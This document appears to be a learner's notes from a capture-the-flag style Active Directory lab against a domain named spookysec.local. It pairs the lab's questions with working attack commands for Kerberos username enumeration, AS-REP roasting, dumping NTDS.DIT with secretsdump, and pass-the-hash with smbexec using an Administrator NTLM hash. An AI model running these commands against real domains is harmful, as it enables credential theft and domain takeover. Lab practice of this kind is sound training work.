enum4linux -A 10.10.28.202
What tool will allow us to enumerate port 139/445?
What is the NetBIOS-Domain Name of the machine?
What invalid TLD do people commonly use for their Active Directory Domain?
kerbrute userenum -d spookysec.local --dc 10.10.210.2 userlist.txt
What command within Kerbrute will allow us to enumerate valid usernames?
What notable account is discovered? (These should jump out at you)
What is the other notable account is discovered? (These should jump out at you)
AS-PEP Roasting攻击，对于设置了选项”Do not require Kerberos preauthentication”的用户，可以离线爆破获取用户的hash
echo 10.10.194.183 spookysec.local >> /etc/hosts
GetNPUsers.py spookysec.local/svc-admin -no-pass
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5, etype 23, AS-REP
What mode is the hash?
Now crack the hash with the modified password list provided, what is the user accounts password?
What utility can we use to map remote SMB shares?
Which option will list shares?
How many remote shares is the server listing?
There is one particular share that we have access to that contains a text file. Which share is it?
What is the content of the file?
Decoding the contents of the file, what is the full contents?
secretsdump.py -just-dc firstname.lastname@example.org
What method allowed us to dump NTDS.DIT?
What is the Administrators NTLM hash?
What method of attack could allow us to authenticate as the user without the password?
Pass the Hash
Using a tool called Evil-WinRM what option will allow us to use a hash?
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc Administrator@spookysec.local